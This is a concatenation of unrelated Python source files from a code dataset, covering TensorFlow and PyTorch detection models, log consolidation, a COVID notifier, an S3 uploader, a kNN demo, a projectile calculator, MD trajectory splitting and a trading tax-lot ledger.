tf.summary.merge([\n tf.summary.scalar('validate/loss', self.loss),\n *[tf.summary.histogram('validate/descriptor_'+str(i), tf.gather(self.descriptor_output, i))\n for i in range(self.single_batch_size*len(self.avail_gpus))]\n ])\n\n self.predict_summary = tf.summary.merge([\n tf.summary.tensor_summary('predict/group',self.group_output,\n summary_description='Predicted group of every pointcloud in batch')\n ])\n\n def train_step(self, session, data, train=False, summary=False):\n # input\n # N x Groups label\n # vox_feature\n # vox_number\n # vox_coordinate\n label = data[0]\n vox_feature = data[1]\n vox_number = data[2]\n vox_coordinate = data[3]\n print('training step')\n\n input_feed = {}\n input_feed[self.is_train] = True\n for idx in range(len(self.avail_gpus)):\n input_feed[self.vox_feature[idx]] = vox_feature[idx]\n input_feed[self.vox_number[idx]] = vox_number[idx]\n input_feed[self.vox_coordinate[idx]] = vox_coordinate[idx]\n input_feed[self.label[idx]] = label[idx]\n\n if train:\n output_feed = [self.loss,self.gradient_norm, self.prob_output, self.update]\n else:\n output_feed = [self.loss, self.prob_output]\n\n if summary:\n output_feed.append(self.train_summary)\n # TODO: multi-gpu support for test and predict step\n return session.run(output_feed, input_feed)\n\n def validate_step(self, session, data, summary=False):\n # input\n # N label\n # vox_feature\n # vox_number\n # vox_coordinate\n label = data[0]\n vox_feature = data[1]\n vox_number = data[2]\n vox_coordinate = data[3]\n print('validation runs')\n\n input_feed = {}\n input_feed[self.is_train] = False\n\n for idx in range(len(self.avail_gpus)):\n input_feed[self.vox_feature[idx]] = vox_feature[idx]\n 
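            # as in train_step, each GPU tower's placeholders receive that tower's slice of the validation batch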
input_feed[self.vox_number[idx]] = vox_number[idx]\n input_feed[self.vox_coordinate[idx]] = vox_coordinate[idx]\n input_feed[self.label[idx]] = label[idx]\n\n output_feed = [self.loss, self.prob_output]\n\n if summary:\n output_feed.append(self.validate_summary)\n return session.run(output_feed, input_feed)\n\n def predict_step(self, session, data, summary=False):\n # input\n # N label\n # vox_feature\n # vox_number\n # vox_coordinate\n label = data[0]\n vox_feature = data[1]\n vox_number = data[2]\n vox_coordinate = data[3]\n print('prediction runs')\n\n input_feed = {}\n input_feed[self.is_train] = False\n for idx in range(len(self.avail_gpus)):\n input_feed[self.vox_feature[idx]] = vox_feature[idx]\n input_feed[self.vox_number[idx]] = vox_number[idx]\n input_feed[self.vox_coordinate[idx]] = vox_coordinate[idx]\n\n output_feed = [self.prob_output, self.descriptor_output]\n [logits, descriptor] = session.run(output_feed, input_feed)\n if summary: \n ret_summary = session.run(self.predict_summary,{\n self.descriptor_output: descriptor,\n self.prob_output: logits})\n\n return [ret_summary]\n \n return [tf.nn.softmax(self.prob_output)]\n \n\n # ref:\n # https://github.com/tensorflow/models/blob/6db9f0282e2ab12795628de6200670892a8ad6ba/tutorials/image/cifar10/cifar10_multi_gpu_train.py#L103\n # Averaging gradients from the clipped ones I guess?\ndef average_gradients(tower_grads):\n\n average_grads = []\n for grad_and_vars in zip(*tower_grads):\n grads = []\n for g in grad_and_vars:\n # Add 0 dimension to the gradients to represent the tower.\n expanded_g = tf.expand_dims(g, 0)\n\n # Append on a 'tower' dimension which we will average over below.\n grads.append(expanded_g)\n\n # Average over the 'tower' dimension.\n grad = tf.concat(axis=0, values=grads)\n grad = tf.reduce_mean(grad, 0)\n\n # Keep in mind that the Variables are redundant because they are shared\n # across towers. So .. 
we will just return the first tower's pointer to\n # the Variable.\n grad_and_var = grad\n average_grads.append(grad_and_var)\n return average_grads\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"model/tf_model.py","file_name":"tf_model.py","file_ext":"py","file_size_in_byte":9369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"208835644","text":"import torch\nfrom typing import *\nfrom torch import nn, Tensor\nfrom object_detection.models.centernet import CenterNet, NetOutput, Head\nfrom object_detection.models.backbones.effnet import (\n EfficientNetBackbone,\n)\nfrom object_detection.models.modules import (\n MaxPool2dStaticSamePadding,\n SeparableConvBR2d,\n MemoryEfficientSwish,\n)\nfrom object_detection.entities import ImageBatch\nfrom fish import config\n\n\nclass FilterCenterNet(nn.Module):\n def __init__(\n self,\n channels: int,\n box_depth: int = 1,\n cls_depth: int = 1,\n fpn_depth: int = 1,\n out_idx: int = 4,\n backbone_id: int = 3,\n num_classes: int = config.num_classes,\n ) -> None:\n super().__init__()\n self.num_classes = num_classes\n backbone = EfficientNetBackbone(3, out_channels=channels, pretrained=True)\n self.net = CenterNet(\n channels=channels,\n num_classes=num_classes,\n backbone=backbone,\n box_depth=box_depth,\n cls_depth=cls_depth,\n fpn_depth=fpn_depth,\n out_idx=out_idx,\n )\n self.filter_head = nn.Sequential(\n SeparableConvBR2d(in_channels=channels),\n MemoryEfficientSwish(),\n MaxPool2dStaticSamePadding(3, 2),\n SeparableConvBR2d(in_channels=channels, out_channels=channels * 2),\n MemoryEfficientSwish(),\n MaxPool2dStaticSamePadding(3, 2),\n SeparableConvBR2d(in_channels=channels * 2, out_channels=num_classes),\n nn.AdaptiveMaxPool2d(1),\n nn.Sigmoid(),\n )\n\n def __call__(self, x: ImageBatch) -> Tuple[NetOutput, Tensor]:\n (heat_maps, box_maps, anchor), fpn = self.net(x)\n fh = self.filter_head(fpn[-1])\n heat_maps = fh * heat_maps\n return (heat_maps, box_maps, anchor), fh.view(-1, self.num_classes)\n","sub_path":"fish/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"653479599","text":"#!/usr/bin/python3\nimport os\n\ndef consolida(files, pos_index, pos_value, delimiter=' ', date=False):\n d_values = dict()\n \n for file in files:\n print ('file', file)\n with open(file, 'r') as f:\n content = [line.rstrip().split(delimiter) for line in f]\n \n # remove headers; [running process id] and [header itself]\n del content[0]\n del content[0]\n \n #print('[P0]', content)\n for row in content:\n idx = int(row[pos_index])\n #print ('idx', idx)\n if not date:\n val = float(row[pos_value])\n else:\n date_value = str(row[pos_value])\n while len(date_value) < 8:\n date_value = '00:' + date_value\n h, m, s = date_value.split(':')\n val = int(h) * 3600 + int(m) * 60 + int(s) * 1\n \n if idx in d_values:\n d_values[idx].append(val)\n else:\n d_values[idx] = [val]\n #print('[P1]', d_values)\n \n for k in d_values.keys():\n idx_vsize = len(d_values[k])\n #print('[P2]', idx_vsize)\n d_values[k] = sum(d_values[k]) / idx_vsize\n #print('[P3]', d_values[k])\n \n return d_values\n \ndef agrega(d1, d2):\n for (k, v) in d2.items():\n if k in d1:\n d1[k].append(d2[k])\n else:\n d1[k] = [d2[k]]\n \ndef lista_arquivos(root_dir, files_extension):\n for directory, subdirectory, files in os.walk(root_dir):\n for file in files:\n if file.endswith(files_extension):\n 
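                # yield matching paths one at a time so callers can stream large directory trees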
#print(os.path.join(directory, file))\n yield str(os.path.join(directory, file))\n \ndef nice_print(headers, data):\n full_table = ','.join(headers) + '\\n'\n \n for (k, v) in data.items():\n syscr, syscw, br, bw, mem, cpu, cpu_time, etimes = v\n table = '%d, ' % k\n table += '%d, ' % syscr\n table += '%d, ' % syscw\n table += '%d, ' % br\n table += '%d, ' % bw\n table += '%1.4f, ' % mem\n table += '%1.2f, ' % cpu\n table += '%d, ' % cpu_time\n table += '%d' % etimes\n print(table)\n full_table += table + '\\n'\n \n return full_table\n\nif __name__ == \"__main__\":\n arquivos = []\n for arquivo in lista_arquivos('.', '.txt'):\n arquivos.append(arquivo)\n \n ## execution time, syscr, syscw, read_bytes, write_bytes, resident memory, %cpu, cpu total time, elapsed time, number of threads, process id, arguments\n headers = 'execution time, syscr, syscw, read_bytes, write_bytes, resident memory, %cpu, cpu total time, elapsed time'.split(',')\n \n syscr = consolida(arquivos, 0, 1)\n syscw = consolida(arquivos, 0, 2)\n br = consolida(arquivos, 0, 3)\n bw = consolida(arquivos, 0, 4)\n mem = consolida(arquivos, 0, 5)\n cpu = consolida(arquivos, 0, 6)\n cpu_time = consolida(arquivos, 0, 7, date=True)\n elapsed_time = consolida(arquivos, 0, 8, date=True)\n #threads = consolida(arquivos, 0, 9)\n \n d_dados = dict()\n agrega(d_dados, syscr)\n agrega(d_dados, syscw)\n agrega(d_dados, br)\n agrega(d_dados, bw)\n agrega(d_dados, mem)\n agrega(d_dados, cpu)\n agrega(d_dados, cpu_time)\n agrega(d_dados, elapsed_time)\n #agrega(d_dados, threads)\n print(d_dados)\n \n table = nice_print(headers, d_dados)\n with open('consolidado.log', 'w') as f:\n f.write(table)\n\n","sub_path":"dados/logs/consolida.py","file_name":"consolida.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"620090523","text":"#CORONA update notifier......\r\nfrom plyer import notification #pip install plyer\r\nfrom covid import Covid #pip install covid\r\nimport time\r\nimport pyttsx3 #pip install pyttsx3\r\n\r\n\r\nvoice=pyttsx3.init('sapi5') #sound API(application program interface)\r\nvoice_list=voice.getProperty('voices')\r\nvoice.setProperty('voices',voice_list[0].id)\r\n\r\n\r\ndef speak(text):\r\n voice.say(text)\r\n voice.runAndWait()\r\n \r\ndef notifyme(title,message):\r\n notification.notify(\r\n title = title,\r\n message = message,\r\n app_icon = None,\r\n timeout=30)\r\n\r\ndef getdata(x):\r\n covid=Covid()\r\n cases=covid.get_status_by_country_name(x)\r\n for x in cases:\r\n print(x,\":\",cases[x])\r\n return f\"confirmed cases are : {cases.get('confirmed')} \\n active cases are : {cases.get('active')} \\n deaths are : {cases.get('deaths')}\"\r\n\r\nif __name__==\"__main__\":\r\n x='india'\r\n notifyme(\"COVID CASES LATEST UPDATE...!!!!\",getdata(x))\r\n speak(\"COVID CASES LATEST UPDATE....!!!!\")\r\n speak(f\"time now is{time.ctime()}\")\r\n speak(getdata(x))\r\n print(time.ctime())\r\n","sub_path":"python project.py","file_name":"python project.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"493456839","text":"# Amazon S3 handling\nimport boto3\nimport logging\n\nlogging.basicConfig(filename='log_weather.log', level=logging.INFO, format='%(asctime)s %(message)s', datefmt='%d/%m/%Y %I:%M:%S %p')\n\nclass AWS_S3:\n def __init__(self, bucket_name, image_filename = \"image.jpg\", telemetry_filename = \"weatherdata.txt\"):\n # 
Return an object and sets the bucket name\n self.s3 = boto3.resource('s3')\n self.bucket_name = bucket_name\n self.telemetry_filename = telemetry_filename\n self.image_filename = image_filename\n\n#upload the telemetry file to the S3 Bucket\n def uploadTelemetry(self):\n try:\n logging.info('Uploading telemetry...')\n self.s3.meta.client.upload_file(self.telemetry_filename, self.bucket_name, self.telemetry_filename, ExtraArgs={ \"ContentType\": \"text/plain\", 'ACL': 'public-read'})\n return True\n except Exception as e:\n logging.critical(str(e) + ' Failed uploading telemetry file to S3')\n return False\n \n #upload the compressed image to the S3 Bucket\n def uploadImage(self):\n try:\n logging.info('Uploading an image to S3..')\n self.s3.meta.client.upload_file(self.image_filename, self.bucket_name, self.image_filename, ExtraArgs={ \"ContentType\": \"image/jpg\", 'ACL': 'public-read'})\n return True\n except Exception as e:\n logging.critical(str(e) + ' Failed uploading an image to S3')\n return False\n ","sub_path":"HandlerS3.py","file_name":"HandlerS3.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"337076978","text":"from fractions import Fraction\ntry:\n\tdef fracToMixed(num,dem):\n\t\t\n\t\ta = num // dem\n\t\tb = num % dem\n\t\t#print(a)\n\t\tprint(\"{} {}/{}\".format(a, b, dem))\n\t\tprint()\n\t\tmain()\n\t\n\tdef gcd(a, b):\n\t if (a == 0):\n\t return b;\n\t return gcd(b % a, a);\n\n\tdef lowest(den3, num3):\n\n\t common_factor = gcd(num3, den3);\n\n\t den3 = int(den3 / common_factor);\n\t num3 = int(num3 / common_factor);\n\t #print(num3, \"/\", den3);\n\t fracToMixed(num3,den3)\n\n\tdef addFraction(num1, den1, num2, den2):\n\n\t den3 = gcd(den1, den2);\n\n\t den3 = (den1 * den2) / den3;\n\n\t num3 = ((num1) * (den3 / den1) -\n\t (num2) * (den3 / den2));\n\n\t lowest(den3, num3);\n\n\tdef main():\n\t\tloop = True\n\t\twhile loop == True:\n\t\t\theltal1 = int(input(\"heltal1 = \"))#2\n\t\t\ttæller1 = int(input(\"tæller1 = \"))#2\n\t\t\tnævner1 = int(input(\"nævner1 = \"))#3\n\n\t\t\theltal2 = int(input(\"heltal2 = \"))#3\n\t\t\ttæller2 = int(input(\"tæller2 = \"))#1\n\t\t\tnævner2 = int(input(\"nævner2 = \"))#2\n\n\n\t\t\tbrøkTop1 = heltal1 * nævner1 + tæller1\n\t\t\tbrøkBot1 = nævner1\n\t\t\t\n\t\t\tbrøkTop2 = heltal2 * nævner2 + tæller2\n\t\t\tbrøkBot2 = nævner2\n\t\t\t#print(f\"{brøkTop1} / {brøkBot1}\")\n\t\t\t#print(f\"{brøkTop2} / {brøkBot2}\\n\")\n\t\t\taddFraction(brøkTop1, brøkBot1, brøkTop2, brøkBot2)\n\n\t\t\t#loop = False\n\tmain()\nexcept KeyboardInterrupt:\n\tprint(\"goodbye\") \n","sub_path":"blandedeTal/blandede_tal_Brøker_minus.py","file_name":"blandede_tal_Brøker_minus.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"419019936","text":"import mglearn\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mglearn.datasets import make_wave\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsRegressor #리그레서 사용\n\nclass GreenStar(object):\n \n x, y = make_wave(n_samples=40) # mglearn의 데이터셋 중 make_wave 에서 가져오는 샘플의 수이다.\n x_train, x_test, y_train, y_test = train_test_split(x, y, random_state=0, test_size=0.3)\n\n def __init__(self):\n self._neighbors = 0 # 가장 가까운 이웃의 갯수이다. 예제에서는 3을 사용한다.\n self._jobs = 0 # 사용할 코어의 수이다. 
-1 이면 모든 코어 사용한다.\n\n @property\n def neighbors(self) -> 0:\n return self._neighbors\n\n @neighbors.setter\n def neighbors(self, neighbors):\n self._neighbors = neighbors\n\n @property\n def jobs(self) -> 0:\n return self._jobs\n\n @jobs.setter\n def jobs(self, jobs):\n self._jobs = jobs\n\n def get_knn_reg_score(self):\n knn_reg = KNeighborsRegressor(n_neighbors=self.neighbors, n_jobs=self.jobs) # 3, -1\n knn_reg.fit(self.x_train, self.y_train)\n return knn_reg.score(self.x_test, self.y_test)\n\n def plot_knn_reg(self):\n _, axes = plt.subplots(1, 3) # 언더바 쉼표 입니다\n xtrain = self.x_train\n xtest = self.x_test\n ytrain = self.y_train\n ytest = self.y_test\n line = np.linspace(-5, 5, num=1000)\n line = line.reshape(-1, 1)\n for i, ax in zip([1, 3, 9], axes.ravel()):\n knn_reg = KNeighborsRegressor(n_neighbors=i, n_jobs=-1)\n knn_reg.fit(xtrain, ytrain)\n prediction = knn_reg.predict(line)\n ax.plot(line, prediction, label='model predict', c='k')\n ax.scatter(xtrain, ytrain, marker='^', c='darkred', label='train target')\n ax.scatter(xtest, ytest, marker='v', c='darkblue', label='test target')\n train_score = knn_reg.score(xtrain, ytrain)\n test_score = knn_reg.score(xtest, ytest)\n ax.set_title('k={}\\n test score={:.3f}\\n train score={:.3f}'.format(i, train_score, test_score))\n ax.set_xlabel('feature')\n ax.set_ylabel('target')\n axes[0].legend(loc=2)\n plt.show()\n\n @staticmethod\n def main():\n knn = GreenStar()\n while 1:\n menu = input('0.Exit\\n 1.Plot\\n 2.Score\\n')\n if menu == '0':\n break\n elif menu == '1':\n knn.neighbors = int(input('Please Enter a Neighbors Value.'))\n mglearn.plots.plot_knn_regression(n_neighbors=knn.neighbors)\n plt.show()\n elif menu == '2':\n knn.neighbors = int(input('Please Enter a Neighbors Value.'))\n knn.jobs = int(input('Please Enter a Jobs Value.'))\n score = knn.get_knn_reg_score()\n print(\"{:.3f}\".format(score)) # 0.697\n elif menu == '3':\n knn.plot_knn_reg()\n else:\n print('Wrong Number. 
Enter Another Number')\n\n\nGreenStar.main()","sub_path":"step6_knn/green_star.py","file_name":"green_star.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"400790248","text":"#-*-coding:utf8;-*-\nimport time\nimport os\n\nfrom math import sin, cos, radians\ng = 9.8 #I am defining the value of g so use it when using the Big 3 below\n\nunits = [\"in\", \"ft\", \"miles\", \"km\", \"m\", \"cm\", \"mm\"]\ntoMeters = [.0254, 0.3048, 1609.34, 1000.0, 1.0, 0.01, 0.001]\n\ntimeunits = [\"s\", \"min\", \"hr\"]\ntoSeconds = [1.0, 60.0, 3600.0]\n\n#print a greeting message to the user below using the included print() function:\nprint(\"Allie Teagle's calculator\")\n\n#\n# MENU\n#\n \nloop = True\nwhile loop:\n print(\" \")\n for i in range(len(units)):\n print(i,\": \",units[i])\n\n print()\n selection = int(input(\"Select length units: \"))\n\n if selection not in range(len(units)):\n print(\"Please enter valid menu options\")\n else:\n loop = False\n\nprint()\n\nloop = True\nwhile loop:\n print(\" \")\n for i in range(len(timeunits)):\n print(i,\": \",timeunits[i])\n\n print()\n timeselection = int(input(\"Select time units: \"))\n\n if timeselection not in range(len(timeunits)):\n print(\"Please enter valid menu options\")\n else:\n loop = False\n\nprint()\n\n# Determine lenth scalar and unit string\nlenscalar = toMeters[selection]\ntimescalar = toSeconds[timeselection]\n \nprint(\"Velocity will be in (\", units[selection], \"/\", timeunits[timeselection], \")\");\n#ask the user for the inputs of launch velocity and angle below. I will do the angle for you:\nangle = float(input(\"What is the projectile's angle of launch: \"))\ninputStr = \"What is the projectile's velocity at launch (\" + units[selection] + \"/\" + timeunits[timeselection] + \"): \"\nvelocity = float(input(inputStr))\n\n\n# Do crappy animation\nWIDTH = 79\noffset = 0\nloop = True\nwhile loop:\n os.system(\"cls\")\n\n if offset > (WIDTH*2/3):\n print(\" \" * offset + \"\\\\\")\n elif offset > (WIDTH/3):\n print(\" \" * offset + \"-\")\n else:\n print(\" \" * offset + \"/\")\n \n \n #move the message a little to the left.\n offset +=1\n #if the entire message has moved 'through' the display then\n #break\n if offset >=WIDTH:\n loop = False\n #take out or change this line to speed up / slow down the display\n time.sleep(0.005)\n\n\n#change the angle from degrees into radians below. 
I will do this for you:\nangle = radians(angle)\n\n#break up the velocity vector into x and y parts below using sin() and cos():\n\nvelx = (velocity * lenscalar * cos(angle)) / timescalar\nvely = (velocity * lenscalar * sin(angle)) / timescalar\n\n#Find the time in air below:\nt = vely / g * 2\nprint(t)\n#Find the max height below:\nht = t/2\ny = vely * ht - .5 * g * ht**2\n\n#Find the horizontal displacement (call it x) below:\nx = velx * t\n\n#Now report your results back to the user below with print() statements.\n#You may want to use the round() function to round your answers.\nprint(\"--------------------------------------------------------------------\")\nprint(\"The x component of initial velocity is \", velx / lenscalar * timescalar, \" (\", units[selection], \"/\", timeunits[timeselection], \")\")\nprint(\"The y component of initial velocity is \", vely / lenscalar * timescalar, \" (\", units[selection], \"/\", timeunits[timeselection], \")\")\n\nprint(\"Time in air is \", t / timescalar, \" (\", timeunits[timeselection], \")\")\nprint(\"Maximum height is \", y / lenscalar, \" (\", units[selection], \")\")\nprint(\"Horizontal distance is \", x / lenscalar, \" (\", units[selection], \")\")\n\nprint(\"--------------------------------------------------------------------\")\n","sub_path":"Current/Python Examples/physics_projectile_motion.py","file_name":"physics_projectile_motion.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"645213183","text":"import csv\n\n# Copied from http://automatetheboringstuff.com/chapter14/\nexampleFile = open('student_data.csv')\nexampleReader = csv.reader(exampleFile)\nexampleData = list(exampleReader)\n# print(exampleData)\n\nprint('exampleData: ', exampleData)\n\nheader = exampleData[0]\ndata = exampleData[1:]\n\nfor row in data:\n print(row)\n\nprint('header:', header)\n\n# print email addresses\nprint('index = ', header.index('Email Address'))\nemails = []\nfor stud in data:\n # print(stud[header.index('Email Address')])\n emails.append(stud[header.index('Email Address')])\n\nprint(emails)\n\nnetids = []\nfor email in emails:\n netids.append(email.split('@')[0])\n\nprint(netids)\n\nfullnames = []\nfor student in data:\n fullname = student[header.index('First Name')] + \" \" + student[header.index('Last Name')]\n fullnames.append(fullname)\n\nprint(fullnames)\n","sub_path":"tyler/cs301/fall18/materials3/code/lec-12-dicts/read_student_data.py","file_name":"read_student_data.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"146283011","text":"### Splitting individual trajectory into individual blocks according to the cluster index of each frame.\n### Usage: python splitTrajs.py \n### Required packages: mdtraj, msmbuilder, numpy, pickle\n### @Chuankai Zhao, czhao37@illinois.edu\n\nimport mdtraj as md\nimport pickle\nimport numpy as np\n\n### load MD trajectory\ndef loadtraj(trajname):\n traj = md.load(trajname + \".mdcrd\",top=\"ABA_Dimer.prmtop\")\n return traj\n\n### splitting individual trajectory into indidual blocks according to the cluster index of each frame.\ndef savetrajstate(trajname, traj, trajID):\n states = cluster.labels_[trajID]\n frames = np.shape(states)[0]\n stateID = states[0]\n frame = 0\n ID_serial = 0\n ID_Start = 0\n for state in states:\n if frame == frames - 1:\n if state == stateID:\n ID_End = frames\n ID_serial = ID_serial + 1\n tag 
= trajname + \"_STATE_\" + str(stateID) + \"_\" + str(ID_serial) + \".xtc\"\n traj[ID_Start:ID_End].save_xtc(tag)\n ID_Start = frame\n\n if state != stateID:\n ID_End = frame\n ID_serial = ID_serial + 1\n tag = trajname + \"_STATE_\" + str(stateID) + \"_\" + str(ID_serial) + \".xtc\"\n traj[ID_Start:ID_End].save_xtc(tag)\n stateID = state\n ID_Start = frame\n if frame == frames - 1:\n ID_End = frames\n ID_serial = ID_serial + 1\n tag = trajname + \"_STATE_\" + str(stateID) + \"_\" + str(ID_serial) + \".xtc\"\n traj[ID_Start:ID_End].save_xtc(tag)\n ID_Start = frame\n\n frame = frame + 1\n\n### Main function\nif __name__ == '__main__':\n\n ### Read the list of MD trajectories\n trajlist = \"List\"\n trajnames = [ line.rstrip() for line in open(trajlist, \"r\")]\n\n ### Read the cluster file\n cluster = pickle.load(open(\"clustering_tica.pkl\",\"rb\"))\n\n\n ### For each trajectory, splitting into individual blocks based on the cluster index\n trajID = 0\n for trajname in trajnames:\n traj = loadtraj(trajname)\n savetrajstate(trajname, traj, trajID)\n trajID = trajID + 1\n","sub_path":"03-ExtractStructures/1-ExtractToXTC/splitTrajs.py","file_name":"splitTrajs.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"117652483","text":"import pandas as pd\nimport numpy as np\nfrom copy import copy\nimport datetime\nfrom pprint import pprint\n\n\nclass Ledger:\n\n \"\"\"\n This class allows for the buying and selling of assets,\n primarily now it will assist in determining tax implications of sales.\n\n In the future, it could be used to track environment information in an enhanced way.\n # at any date, we compute everything that did happen after the transactions, assuming that we close things on that day.\n This is a simplification as market orders could take time to fill, but for now this is good.\n\n self.d holds daily buys, sells,and tax implications of each asset used\n self.s holds scalars, and values like holdings of each asset class.\n \"\"\"\n\n def __init__(self, assets, df=None, tax_threshold_days=365):\n self.assets = assets\n self.d = {a: {} for a in assets}\n self.s = {}\n self.tax_threshold_days = tax_threshold_days\n self.dates = []\n\n def date_from_str(self, datestr):\n return pd.to_datetime(datestr, infer_datetime_format=True).date()\n\n def date_to_str(self, date):\n return str(date)\n\n def coerce_date(self, date):\n \"\"\"\n This function takes in a date object of many types and coerces it to a str representation\n \"\"\"\n if isinstance(date, datetime.date):\n date = self.date_to_str(date)\n elif isinstance(date, datetime.datetime):\n date = self.date_to_str(date.date())\n elif isinstance(date, str):\n pass\n else:\n raise Exception(\"unknown date type\")\n assert isinstance(date, str)\n return date\n\n def log_transactions(self, date, transactions, prices):\n \"\"\"\n This function takes in transactions and prices, and computes tax implications of these transactions.\n It returns a dictionary of each asset and the tax implications of sale.\n It also records all of the transactions in self.d\n Args:\n date (str or datetime): Date to log for the transactions\n transactions (list(float)): Transactions corresponding to each asset. 
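                Positive values are buys and negative values are sells, e.g. [2, -1] buys 2 units of asset 0 and sells 1 unit of asset 1.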
TODO: Allow dictionary actions\n prices (list(float)): Price per asset (in order of self.assets)\n returns:\n dict\n keys:\n spend: Amount spent on share purchases\n proceeds: Amount from selling shares\n assets:\n idx: Index of asset in self.assets\n short profit: Profits that are 'short term'. Computed as price-avg cost (could be negative)\n long porift: Profits that are 'long term'. Computed as price--avg cost (could be negative)\n \"\"\"\n date = self.coerce_date(date)\n if date not in self.dates:\n self.dates.append(date)\n # carry over previous values and overwrite them.\n if len(self.dates) == 1:\n self.s[date] = {}\n else:\n self.s[date] = copy(self.s[self.dates[-2]])\n self.s[date][\"transactions\"] = transactions\n self.s[date][\"prices\"] = prices\n tax_d = {\"assets\": {}}\n # compute selling proceeds\n sells = -np.clip(transactions, -np.inf, 0)\n proceeds = np.dot(sells, prices)\n tax_d[\"proceeds\"] = proceeds\n\n # compute buy costs\n buys = np.clip(transactions, 0, np.inf)\n spend = np.dot(buys, prices)\n tax_d[\"spend\"] = spend\n\n for i, (a, t, p) in enumerate(zip(self.assets, transactions, prices)):\n buys, sells = max(0, t), -min(0, t)\n\n self.d[a][date] = {\"buys\": buys, \"sells\": sells, \"price\": p, \"tax_used\": 0}\n if sells > 0: # consider order here\n lots = self.compute_tax_lots(a, sells, date)\n # compute profit/loss of this tax lot\n lots[\"short_profit\"] = (prices[i] - lots[\"short_avg_price\"]) * lots[ # Should this be short_avg - prices????\n \"short_term_shares\"\n ]\n lots[\"long_profit\"] = (prices[i] - lots[\"long_avg_price\"]) * lots[\n \"long_term_shares\"\n ]\n tax_d[\"assets\"][i] = lots\n self._compute_holdings()\n return tax_d\n\n def _compute_holdings(self):\n \"\"\"\n This function looks at assets held, and determines the total assets of each type held\n It also breaks these down by the nature of the asset (long term vs short term)\n\n \"\"\"\n holdings = [0 for _ in self.assets]\n long_term_holdings, short_term_holdings = [0 for _ in self.assets], [\n 0 for _ in self.assets\n ]\n for i, a in enumerate(self.assets):\n before_dates = [\n (\n self.date_from_str(self.current_date)\n - datetime.timedelta(self.tax_threshold_days)\n )\n > self.date_from_str(x)\n for x in self.dates\n ]\n for long_term, d in zip(\n before_dates, [self.date_to_str(x) for x in self.dates]\n ):\n holdings[i] += self.d[a][d][\"buys\"]\n holdings[i] -= self.d[a][d][\"sells\"]\n if long_term:\n long_term_holdings[i] += self.d[a][d][\"buys\"]\n long_term_holdings[i] -= self.d[a][d][\"tax_used\"]\n else:\n short_term_holdings[i] += self.d[a][d][\"buys\"]\n short_term_holdings[i] -= self.d[a][d][\"tax_used\"]\n\n assert min(holdings) >= 0\n self.s[self.current_date][\"holdings\"] = holdings\n self.s[self.current_date][\"long_term_holdings\"] = long_term_holdings\n self.s[self.current_date][\"short_term_holdings\"] = short_term_holdings\n\n def log_scalars(self, date, data: dict):\n \"\"\"\n This function logs scalars for a given date.\n args:\n date (str or datetime): date to log for\n data (dict): Dictionary of keys and values to log into the scalar data structure.\n \"\"\"\n date = self.coerce_date(date)\n if date != self.current_date:\n raise Exception(\"this shouldn't happen\")\n for k, v in data.items():\n self.s[date][k] = v\n\n @property\n def long_term_holdings(self):\n # TODO: if we want long term holdings to be compute for next trading day as opposed to current one\n return self.s[self.current_date][\"long_term_holdings\"]\n\n @property\n def 
short_term_holdings(self):\n return self.s[self.current_date][\"short_term_holdings\"]\n\n @property\n def holdings(self):\n return self.s[self.current_date][\"holdings\"]\n\n @property\n def current_date(self):\n return self.dates[-1]\n\n @property\n def cash(self):\n if \"cash\" not in self.s[self.current_date]:\n return self.s[self.dates[-2]][\"cash\"]\n else:\n return self.s[self.current_date][\"cash\"]\n\n @property\n def asset_value(self):\n return self.s[self.current_date][\"asset_value\"]\n\n @property\n def total_assets(self):\n return self.s[self.current_date][\"total_assets\"]\n\n @property\n def total_value(self):\n return self.asset_value + self.cash\n\n def compute_tax_lots(self, asset, sells, sell_date):\n a_data = copy(self.d[asset])\n remaining_shares = sells\n long_shares = 0\n long_total_value = 0\n short_shares = 0\n short_total_value = 0\n # need to figure out average cost for long term and short term\n # ok, let's loop here and use up shares oldest to youngest\n dates = sorted(a_data)\n i = 0\n while remaining_shares > 0:\n date = dates[i]\n long_term = (\n self.date_from_str(sell_date)\n - datetime.timedelta(days=self.tax_threshold_days)\n ) > self.date_from_str(date)\n\n d = a_data[date]\n avail_shares = d[\"buys\"] - d[\"tax_used\"]\n\n # account for float imprecision\n if avail_shares < 1e-9:\n avail_shares = 0\n break\n\n if avail_shares > 0:\n # let's consume these\n if avail_shares < remaining_shares:\n shares_consumed = avail_shares\n else:\n shares_consumed = remaining_shares\n\n remaining_shares -= shares_consumed\n if long_term:\n long_shares += shares_consumed\n long_total_value += shares_consumed * d[\"price\"]\n else:\n short_shares += shares_consumed\n short_total_value += shares_consumed * d[\"price\"]\n\n a_data[date][\"tax_used\"] = shares_consumed\n i += 1\n\n self.d[asset] = a_data\n\n def get_avg_price(shares, value):\n if shares == 0:\n return 0\n else:\n return value / shares\n\n return {\n \"asset\": asset,\n \"long_term_shares\": long_shares,\n \"long_avg_price\": get_avg_price(long_shares, long_total_value),\n \"short_term_shares\": short_shares,\n \"short_avg_price\": get_avg_price(short_shares, short_total_value),\n 